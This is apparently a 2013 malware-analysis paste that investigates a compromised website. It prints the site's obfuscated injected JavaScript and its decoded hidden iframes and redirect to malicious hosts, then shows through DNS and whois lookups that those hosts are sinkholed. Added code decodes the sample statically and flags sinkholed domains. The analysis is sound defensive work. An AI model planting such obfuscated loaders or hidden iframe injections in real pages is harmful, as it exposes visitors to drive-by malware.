Already Sinkholed Infector.. Bad leads from MDL.. sigh..

MalwareMustDie Apr 15th, 2013
// #MalwareMustDie - @unixfreaxjp $ date
// Mon Apr 15 15:04:13 JST 2013
// This is what happens when old infector domains
// are still listed in the MDL..
// A waste of investigation time..
// "Once again I have cut something worthless.." (またつまらぬ物を切ってしまったなー)

// Suspected URL:
http://hicovi.com/

// download....

--2013-04-15 16:17:41--  http://hicovi.com/
Resolving hicovi.com... 200.57.147.12
Caching hicovi.com => 200.57.147.12
Connecting to hicovi.com|200.57.147.12|:80... connected.
  :
GET / HTTP/1.1
Referer: http://google.com/
User-Agent: We  think, your URL stink...
Host: hicovi.com
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Content-Length: 13509
Content-Type: text/html
Content-Location: http://hicovi.com/vienepronto.html
Last-Modified: Sun, 14 Nov 2010 20:46:26 GMT
Accept-Ranges: bytes
ETag: "d97b9013d84cb1:d0ce4"
X-Powered-By: ASP.NET
Date: Mon, 15 Apr 2013 07:17:42 GMT
  :
200 OK
Length: 13509 (13K) [text/html]
Saving to: ‘index.html’
2013-04-15 16:17:43 (28.4 KB/s) - ‘index.html’ saved [13509/13509]

// snapshot..
$ cat index.html | grep script
<script src=http://sandraromainass.com/porn-star/wp-links-opml.php ></script> // good one…

// these are the bad ones....

<script>function uEQTGT(Tly){fff.op.replace("330"); }
</script>
<script>function nme(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(nme()>100000){function eEbKvNHSe(qEMQFOXnKc){ alert('nOBevVbxC');var nwTsnsgjfK = document.getElementById('olXPOWIOd'); }
}</script>
<script>function JODI(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(JODI()>100000){function qArhFjyvWg(soEm){var CcySlu=4,vcN=5;var QdlNbSLt='122-2+166-2+153-3+165-3+158-2+164-0+167-1+124-0+167-1+163-1+164-0+111-1+160-4+163-1+153-3+152-0+167-1+158-2+163-1+162-2+123-1+105-3+157-3+167-1+167-1+164-0+120-4+112-0+112-0+165-3+',AMT=QdlNbSLt.split('+');PMoQuQ='';function XKJepVPIJ(c){return String.fromCharCode(c);}for(StgCp=(AMT.length-1);StgCp>=(-0x11+0x1f-0x2-0x8-0xb+0x7);StgCp-=0x29+0x7-0x2f+0x1+0x22-0x23){ mgN=AMT[StgCp].split('-');GalcEbPPSt = parseInt(mgN[0]*vcN)+parseInt(mgN[1]);GalcEbPPSt = parseInt(GalcEbPPSt)/CcySlu;PMoQuQ = XKJepVPIJ(GalcEbPPSt-(0x19-0x14+0x25+0x24+0xe+0x1))+PMoQuQ;}if( PMoQuQ.charCodeAt( PMoQuQ.length-1) == 0)PMoQuQ = PMoQuQ.substring(0, PMoQuQ.length-1);return PMoQuQ.replace(/^\s+|\s+$/g, '');}function fCuF(lTKU){ var Fmlq = document.getElementById('dhgLIn');alert('zPIs');window.eval();alert('zPIs'); }
}</script>

// decoded..

<iframe width=1 height=1 border=0 frameborder=0 src='http://oughwa.com/in4.php'></iframe>
(repeated 1 time)
<iframe width=1 height=1 border=0 frameborder=0 src='http://hindger.com/in2.php'></iframe>
(repeated 1 time)
<script>top.location = 'http://rascop.com/red2.php';
</script>


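// Added example, not part of the original paste: a static re-implementation of the
// decoder inside the second obfuscated <script> above (the JODI/qArhFjyvWg one), so the
// payload can be recovered without loading the page in a browser or calling eval(), plus
// a small extractor that pulls the injected targets out of the decoded HTML. The helper
// names are mine. The encoded string is copied exactly as the paste shows it, which is
// truncated, so the decoded text also stops early; the decoded iframes/redirect used as
// input for the extractor are the ones listed in the notes above.

```javascript
'use strict';

// The sample hides its loop bounds and character offset in sums of hex literals.
// Evaluate them without eval(): only a sum/difference of hex literals is accepted.
function evalHexSum(expr) {
  if (!/^-?0x[0-9a-fA-F]+([+-]0x[0-9a-fA-F]+)*$/.test(expr)) {
    throw new Error('not a pure hex sum: ' + expr);
  }
  return expr.match(/[+-]?0x[0-9a-fA-F]+/g)
             .reduce((sum, term) => sum + parseInt(term, 16), 0);
}

// The three expressions as they appear in the sample.
const LOOP_FLOOR  = evalHexSum('-0x11+0x1f-0x2-0x8-0xb+0x7');  // 0
const LOOP_STEP   = evalHexSum('0x29+0x7-0x2f+0x1+0x22-0x23'); // 1
const CHAR_OFFSET = evalHexSum('0x19-0x14+0x25+0x24+0xe+0x1'); // 93

// Each '+'-separated token is "a-b". The sample computes (a*vcN + b)/CcySlu - offset with
// vcN=5 and CcySlu=4 and prepends each character while walking the tokens backwards,
// which gives the same result as walking them forwards.
function decodeTokens(encoded, { mul = 5, div = 4, offset = CHAR_OFFSET } = {}) {
  let out = '';
  for (const token of encoded.split('+')) {
    // The trailing '+' yields an empty token; the sample turns it into a NUL and
    // strips it again afterwards, so skipping it is equivalent.
    if (token === '') continue;
    const [a, b] = token.split('-').map(Number);
    const code = (a * mul + b) / div - offset;
    if (!Number.isInteger(code) || code < 0) {
      throw new Error('malformed token: ' + token);
    }
    out += String.fromCharCode(code);
  }
  return out.trim();   // the sample ends with the same whitespace trim
}

// Collect iframe src URLs and top.location redirects from decoded HTML.
function extractTargets(html) {
  const targets = [];
  const re = /(?:<iframe[^>]*\bsrc=|top\.location\s*=\s*)['"]?(https?:\/\/[^'"\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) targets.push(m[1]);
  return targets;
}

// Encoded string exactly as the paste shows it (truncated there, so truncated here).
const ENCODED = '122-2+166-2+153-3+165-3+158-2+164-0+167-1+124-0+167-1+163-1+164-0+111-1+160-4+163-1+153-3+152-0+167-1+158-2+163-1+162-2+123-1+105-3+157-3+167-1+167-1+164-0+120-4+112-0+112-0+165-3+';

// Constructed input: the decoded output listed in the notes above.
const DECODED_SAMPLE = [
  "<iframe width=1 height=1 border=0 frameborder=0 src='http://oughwa.com/in4.php'></iframe>",
  "<iframe width=1 height=1 border=0 frameborder=0 src='http://hindger.com/in2.php'></iframe>",
  "<script>top.location = 'http://rascop.com/red2.php';</script>",
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(decodeTokens(ENCODED));        // "<script>top.location='http://r" (cut off in the paste)
  console.log(extractTargets(DECODED_SAMPLE));
}
```

The point of rejecting anything but a pure hex sum in `evalHexSum` is that these constants are the only part of such droppers that actually need arithmetic; everything else is string handling, so nothing from the sample ever reaches an evaluator.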
// grabs...

// first url loops...

--2013-04-15 16:41:45--  http://oughwa.com/in4.php
Resolving oughwa.com... 199.2.137.133
Caching oughwa.com => 199.2.137.133
Connecting to oughwa.com|199.2.137.133|:80... connected.
   :
GET /in4.php HTTP/1.1
Referer: http://hicovi.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: oughwa.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers.
Retrying.
   :
--2013-04-15 16:41:47--  (try: 2)  http://oughwa.com/in4.php
Found oughwa.com in host_name_addresses_map (0x7f8ccac04990)
Connecting to oughwa.com|199.2.137.133|:80... connected.
   :
GET /in4.php HTTP/1.1
Referer: http://hicovi.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: oughwa.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :   // loops...


// second url:

--2013-04-15 16:45:45--  http://hindger.com/in2.php
Resolving hindger.com... 199.2.137.133
Caching hindger.com => 199.2.137.133
Connecting to hindger.com|199.2.137.133|:80... connected.
  :
GET /in2.php HTTP/1.1
Referer: http://hicovi.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: hindger.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers.
    // same loops...

// third url..

--2013-04-15 16:47:48--  http://rascop.com/red2.php
Resolving rascop.com... 199.2.137.133
Caching rascop.com => 199.2.137.133
Connecting to rascop.com|199.2.137.133|:80... connected.
  :
GET /red2.php HTTP/1.1
Referer: http://hicovi.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: rascop.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers.
   // same loops....


// Do the simulation & captures..
( done )
// result.. strange, looks like it is already in a sinkhole or so..

// domains investigation...

$ cat domain.txt

hicovi.com
oughwa.com
hindger.com
rascop.com

$ bash check.sh

hicovi.com,200.57.147.12,DNS1.TRIARA.COM
DNS2.TRIARA.COM
DNS3.TRIARA.COM
oughwa.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
NS2.MICROSOFTINTERNETSAFETY.NET
hindger.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
NS2.MICROSOFTINTERNETSAFETY.NET
rascop.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
NS2.MICROSOFTINTERNETSAFETY.NET



// we saw that

oughwa.com
hindger.com
rascop.com

// are already blocked.. this explains the badware's alert.
   Domain Name: MICROSOFTINTERNETSAFETY.NET
   Registrar: MARKMONITOR INC.
   Whois Server: whois.markmonitor.com
   Referral URL: http://www.markmonitor.com

// where is 199.2.137.133?
  Sprint NETBLK-SPRINT-BLKA (NET-199-0-0-0-1) 199.0.0.0 - 199.3.255.255
  Microsoft Corp FON-3338832128690 (NET-199-2-137-0-1) 199.2.137.0 - 199.2.137.255
// .. in the Microsoft network... sinkholed....
// google explained: listed at the malwaredomains.com site in September 2011.
// case closed....
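// Added example, not part of the original paste: the triage done by eye above, automated
// over the check.sh output so that leads already pointing at a sinkhole are flagged before
// any time is spent on wget runs. It parses the domain,IP,NS records (continuation lines
// carry the extra nameservers), then flags a domain when a nameserver sits under a known
// sinkhole NS domain or its address falls in a known sinkhole netblock. The only indicators
// used are the ones this paste establishes (MICROSOFTINTERNETSAFETY.NET nameservers and the
// 199.2.137.0/24 Microsoft Corp netblock from the whois output); a real list would be longer,
// and the function names are mine. check.sh itself is not shown in the paste, so only its
// output format is assumed here.

```javascript
'use strict';

// Indicators taken from this paste only; extend from your own sinkhole list.
const SINKHOLE_NS_SUFFIXES = ['microsoftinternetsafety.net'];
const SINKHOLE_NETBLOCKS   = ['199.2.137.0/24'];

function ipv4ToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error('bad IPv4 address: ' + ip);
  }
  // >>> 0 keeps the value unsigned; the bitwise ops above work in signed 32-bit.
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

function inCidr(ip, cidr) {
  const [net, bitsStr] = cidr.split('/');
  const bits = Number(bitsStr);
  if (!Number.isInteger(bits) || bits < 0 || bits > 32) throw new Error('bad CIDR: ' + cidr);
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
}

// Parse "domain,ip,ns" records; a line without commas is an extra NS for the record above.
function parseCheckOutput(text) {
  const records = [];
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (!line) continue;
    if (line.includes(',')) {
      const [domain, ip, ns] = line.split(',').map(s => s.trim());
      records.push({ domain, ip, ns: ns ? [ns] : [] });
    } else if (records.length) {
      records[records.length - 1].ns.push(line);
    } else {
      throw new Error('continuation line before any record: ' + line);
    }
  }
  return records;
}

function classify(record) {
  const reasons = [];
  for (const ns of record.ns) {
    const n = ns.toLowerCase();
    if (SINKHOLE_NS_SUFFIXES.some(s => n === s || n.endsWith('.' + s))) reasons.push('ns:' + ns);
  }
  for (const block of SINKHOLE_NETBLOCKS) {
    if (inCidr(record.ip, block)) reasons.push('ip:' + block);
  }
  return { domain: record.domain, ip: record.ip, sinkholed: reasons.length > 0, reasons };
}

function triage(text) {
  return parseCheckOutput(text).map(classify);
}

// Constructed input: the check.sh output from the notes above, verbatim.
const CHECK_OUTPUT = `
hicovi.com,200.57.147.12,DNS1.TRIARA.COM
DNS2.TRIARA.COM
DNS3.TRIARA.COM
oughwa.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
NS2.MICROSOFTINTERNETSAFETY.NET
hindger.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
NS2.MICROSOFTINTERNETSAFETY.NET
rascop.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
NS2.MICROSOFTINTERNETSAFETY.NET
`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of triage(CHECK_OUTPUT)) {
    console.log(`${r.domain}\t${r.ip}\t${r.sinkholed ? 'SINKHOLED ' + r.reasons.join(' ') : 'live lead'}`);
  }
}
```

Run this over a whole MDL export (or the resolved output of your own check script) before fetching anything: the nameserver test catches sinkholes that have moved to a new netblock, and the netblock test catches sinkholes that keep the attacker's original NS names.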
  185.  
  186. ---
  187. #MalwareMustDie